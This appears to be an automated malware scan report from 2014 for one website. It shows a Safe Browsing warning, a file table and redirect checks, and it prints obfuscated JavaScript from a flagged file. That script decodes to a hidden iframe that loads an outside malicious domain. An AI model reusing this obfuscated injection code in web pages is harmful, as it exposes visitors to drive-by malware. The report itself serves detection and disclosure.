Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rebrandshowcase.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rebrandshowcase.com/ | 200 OK Content-Length: 85 Content-Type: text/html | clean |
http://rebrandshowcase.com/test404page.js | 404 Not Found Content-Length: 32623 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(i=='asd')throw 1;}catch(q){n=-1*(d-d2);}
n=[7-n,7-n,103-n,100-n,30-n,38-n,98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,101-n,99-n,114-n,67-n,106-n,99-n,107-n,99-n,108-n,114-n,113-n,64-n,119-n,82-n,95-n,101-n,76-n,95-n,107-n,99-n,38-n,37-n,96-n,109-n,98-n,119-n,37-n,39-n,89- Decoded script: <SCRIPT> document.write("<IFRAME SRC=http://you-want-me.ru/go/index.php?2525025 WIDTH=2 HEIGHT=1 FRAMEBORDER=0 SCROLLING=NO NORESIZE> </IFRAME>"); </SCRIPT> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rebrandshowcase.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Aug 2014 08:51:20 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 85
Content-Type: text/html
X-Powered-By: PHP/4.3.9
...85 bytes of data.
GET / HTTP/1.1
Host: rebrandshowcase.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Aug 2014 08:51:20 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 85
Content-Type: text/html
X-Powered-By: PHP/4.3.9
...85 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rebrandshowcase.com
Referer: http://www.google.com/search?q=rebrandshowcase.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rebrandshowcase.com
Referer: http://www.google.com/search?q=rebrandshowcase.com
Result:
The result is similar to the first query. There are no suspicious redirects found.